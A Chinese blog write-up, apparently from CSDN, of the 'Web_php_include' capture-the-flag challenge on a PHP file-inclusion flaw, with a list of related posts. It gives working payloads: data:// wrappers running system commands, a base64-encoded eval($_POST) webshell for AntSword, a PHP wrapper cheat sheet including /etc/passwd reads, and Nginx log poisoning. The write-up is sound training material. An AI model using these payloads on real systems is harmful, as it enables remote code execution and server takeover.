攻防世界web高手区Web_php_include

最新推荐文章于 2024-05-24 22:45:00 发布
最新推荐文章于 2024-05-24 22:45:00 发布
阅读量146 收藏
点赞数 9
分类专栏: ctf web 攻防世界 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChamZhiZe/article/details/120742408
版权
ctf 同时被 3 个专栏收录
11 篇文章 0 订阅
订阅专栏
web
6 篇文章 0 订阅
订阅专栏
攻防世界
5 篇文章 0 订阅
订阅专栏

题目源码:

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

函数介绍

strstr():
搜索字符串在另一个字符串中是否出现,如果是,返回字符串及剩余部分,否则返回false
函数不区分大小写

strstr(): 搜索字符串在另一个字符串中是否出现,如果是,返回字符串及剩余部分,否则返回false 函数不区分大小写

解决方法

方法一:

?page=PHP://input
然后post传值。
然而我并没有实现。。。

方法二:

?page=data://text/plain,<?php system("ls");?>
就直接可以惊醒操作
?page=data://text/plain,<?php system("cat 文件名");?>



最好使用base64 加密后拼接使用
http://111.200.241.244:56881/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJkaXIiKT8%2B
注意协议后 plain后面是;    不是,  
其次   <?php system("ls")?>   -->   <?php system("ls")?>  是可以直接使用的
还有一个函数dir    
dir 是显示目录下文件名称   <?php system("dir")?> ---->   PD9waHAgc3lzdGVtKCJkaXIiKT8+   会出现+    浏览器不认识+  所以base64 编码之后 把 + 号 再次URL编码  即可 PD9waHAgc3lzdGVtKCJkaXIiKT8%2B
之后操作同理:
http://111.200.241.244:56881/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==

方法三

payload和方法二 差不多

http://111.200.241.244:56881/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbNjY2XSk7ID8%2B
PD9waHAgZXZhbCgkX1BPU1RbNjY2XSk7ID8+  ---->  <?php eval($_POST[666]); ?>
中国蚁剑连接 
上述payload就是 URL地址
连接密码就是 666

在这里插入图片描述

伪协议

file://         				   ?file=file:///etc/passwd
php://filter				   ?file=php://filter/read=convert.base64-encode/resource=./index.php
php://input				   ?file=php://input POST DATA
zip://					   ?file=zip:///tmp/1.zip%231.txt
compress.bzip2://				   ?file=compress.bzip2://./file.bz2
compress.zlib://				   ?file=compress.zlib://./file.gz
data://					   ?file=data://text/plain, or ?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
					   ?file=data:text/plain, or ?file=data.text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
phar://					   ?file=phar://php.zip/php.jpg


利用日志文件包含:
Nginx的日志文件是/var/log/nginx/access.log,对服务器的请求都会记录到日志文件中去。
构造请求 :<?php eval($_GET[2]);?>    然后访问:
url/?file=/var/log/nginx/access.log&2=system('ls');

一定要先看一下 目录   ls一下   否则你直接查看flag.php这不就访问不到啦!!!!


PHP中 无后缀文件  只有SESSION   在 ctf.show web 82 的代码脚本中有 

文件包含漏洞 日志注入 还可以  通过一句话木马  连接蚁剑  然后访问做题  BP 抓包  然后  传入。。OK   有视频 !!!!

伪协议的常见用法:

1.php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter

2.、data协议

用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

3.、file协议
用法:
file://[本地文件系统的绝对路径]

ctf之php伪协议的使用
一只菜鸟呀的博客
05-20 1566
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3718
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
NSSCTF刷题笔记web3——[SWPUCTF 2021 新生赛]include
qq_45692883的博客
01-18 594
考点是,绕过php文件被包裹会当做后端语言执行,需要通过伪协议base64加密的方式提取出来。代码如上,没有做任何的过滤。
CTF-Web-常用伪协议用法:
半岛铁盒的博客
12-08 1252
常用伪协议用法: 1.php伪协议 用法 php://input,用于执行php代码,需要post请求提交数据。 php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php 需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp 不需要开启allow_url_fopen:php://filter 2.、data协议 用法: da
CTF常用伪协议总结
weixin_51735061的博客
02-26 6751
PHP伪协议 file://协议 用来读取本地的文件,当用于文件读取函数时可以用。 常见检测是否存在漏洞写法: www.xxx.com/?file=file:///etc/passwd 此协议不受allow_url_fopen,allow_url_include配置影响 php://input协议 此协议一般用于输入getshell的代码。 使用方法: 在get处填上php://input如下 www.xxx.xxx/?cmd=php://input 然后用hackbar或者其他工具,pos
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2431
基本原理
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 513
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界WebWeb_php_wrong_nginx_config
Light_inthe_eyes的博客
11-03 2052
首先进来是一个登录页面: 通过御剑扫描,发现了robots.txt,打开发现两个php文件: hint.php: Hack.php是跳转到登录页面: 抓包看看Hack.php,发现了可疑的点Cookie:isLogin=0,不妨修改为1,进入控制中心: 发现url中file=index&ext=php,不妨测试一下../,发现这里过滤了../: 绕过../,根据hint.php可以知道配置文件的路径,那就构造payload:file=....//....//....//....//etc/nginx
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 512
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。分大小写,stristr()函数不分大小写。 string:必需。规定.
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1751
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTF—Web—文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
最新发布
2401_84208172的博客
05-24 1879
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
CTF-WEBPHP 伪协议
xv66666的博客
07-29 417
在 index.php 页面下有个 file 参数用于接收要包含的文件,设置之为 php://input 伪协议,用 post 传递要执行的 php 代码。对于变量 user,当传进去的变量的参数作为文件名变量去打开时,可用 php://input 作为参数,同时使用 post 方式传入内容作为变量的文件内容。当包含的文件在服务器本地时,就形成了本地文件包含。,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。
CTFweb篇-PHP伪协议的使用
weixin_44597701的博客
08-05 1531
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。(不明白啥子鬼意思) 就是PHP伪协议可以用来作为输入输出,以此来占为己用 php://stdin 相当于打开一个文件指针,可以从输入缓冲读取输入。 ...
ctf中常用的PHP伪协议
weixin_35756637的博客
01-02 857
在CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器中执行PHP代码,例如:...
CTF中文件包含&伪协议
wikey 的博客
03-29 314
我们都知道require_once在调用时php会检查该文件是否已经被包含过,而这里在前面就已经包含了文件,我们在后面再想包含’flag.php’时就不能实现了,而我们需要做到就是怎么绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。因为 php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中。的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。
ctf中关于php伪协议的考查
蚁景网安学院
09-04 335
1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinc...
CTF-web 第八部分 常见加密与文件包含 伪协议
iamsongyu的博客
11-05 2256
(1)加密解密等 我们在做题的时候,经常会遇到一些奇怪的加密解密的字符串,这就需要我们能够识别一些比较常用的。        1.base64         这是一个常用的编码,而且原理也十分简单,非常容易得到原内容。 三字节变为四字节 前面补两个0。  所谓Base64,就是说选出64个字符----小写字母a-z、大写字母A-Z、数字0-9、符号"+"、"/"(再加上作为垫字的"=",实...
ctf-试试协议吧(PHP伪协议)
qq_29566629的博客
02-10 737
在ctf中经常用到伪协议,其使用的先决条件如下: allow_url_fopen和allow_url_include都设置为on 源代码里有include: 常用的伪协议有两种: 一、php://filter 作用是读取源码 http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php 二、php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tutou_hao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值